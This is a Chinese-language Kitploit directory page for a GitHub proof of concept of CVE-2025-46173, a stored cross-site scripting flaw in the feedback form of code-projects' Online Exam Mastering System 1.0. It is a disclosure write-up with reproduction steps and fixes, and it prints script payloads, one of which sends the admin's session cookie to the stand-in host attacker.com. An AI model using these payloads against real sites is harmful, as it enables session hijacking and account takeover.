Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-46173 — 针对CVE-2025-46173的PoC | Kitploit
工具/GitHubGitHub/pruthuraut/cve-2025-46173
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubpruthuraut/cve-2025-46173

CVE-2025-46173

针对CVE-2025-46173的PoC

查看仓库
31年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-46173 - Online Exam Mastering System 1.0 存储型跨站脚本(XSS)漏洞

📌 概述

CVE-2025-46173 是 code-projects 开发的 Online Exam Mastering System 1.0 中存在的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于 feedback.php 组件中,用户在姓名字段中的输入未经过适当的净化处理,恶意攻击者可借此注入任意 JavaScript。当管理员在管理后台(dash.php)查看该反馈时,载荷会在管理员的浏览器中执行,从而导致会话劫持和潜在的权限提升。


🧠 漏洞详情

  • 漏洞类型: 存储型跨站脚本(XSS)
  • CVE 编号: CVE-2025-46173
  • 厂商: code-projects
  • 产品: Online Exam Mastering System
  • 受影响版本: 1.0
  • 组件: feedback.php、dash.php
  • 攻击途径: 远程
  • 影响: 权限提升、会话劫持

📷 概念验证

1. 注入

用户在反馈表单的姓名字段中提交以下载荷:

root@kitploit:~
<script>alert(document.cookie)</script>

反馈表单中的载荷

2. 触发

当管理员随后在 dash.php 中查看提交的反馈时,载荷将执行:

管理员触发 XSS

3. 结果

管理员的会话 Cookie 通过 document.cookie 被暴露,可被窃取:

root@kitploit:~
<script>
  fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>

⚙️ 复现步骤

  1. 从 code-projects 克隆或搭建存在漏洞的版本。

  2. 访问 localhost/exam/feedback.php。

  3. 在"姓名"字段中填入:

    root@kitploit:~
    <script>alert(document.cookie)</script>
    
  4. 提交表单。

  5. 以管理员身份登录并访问 dash.php?q=3 查看反馈。

  6. 该脚本将在管理员的上下文中执行。


🔥 影响

成功利用该漏洞可使远程攻击者:

  • 窃取管理员会话 Cookie
  • 冒充管理员用户
  • 获得完全管理员访问权限
  • 修改或删除测试数据
  • 提升权限

🔒 修复建议

  • 净化用户输入,对 HTML 特殊字符(例如 &、<、>、")进行转义。
  • 使用健壮的净化库,例如 PHP 的 htmlspecialchars(),或采用前端验证 + 后端净化的组合方案。
  • 实施内容安全策略(CSP)。
  • 考虑在将数据渲染到 DOM 之前对其进行编码。

🔗 参考资料

  • Blind Cross-Site Scripting (Invicti)
  • Acunetix - Detecting Blind XSS
  • OWASP XSS Prevention Cheat Sheet

👤 发现者

Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub


截图仅供教育用途。所有测试均在本地环境中完成。

🎥 视频 PoC

点击此处观看演示视频


⚠️ 免责声明

此信息仅供教育和研究目的使用。请勿将其用于您不拥有或未经明确许可测试的系统。

下载工具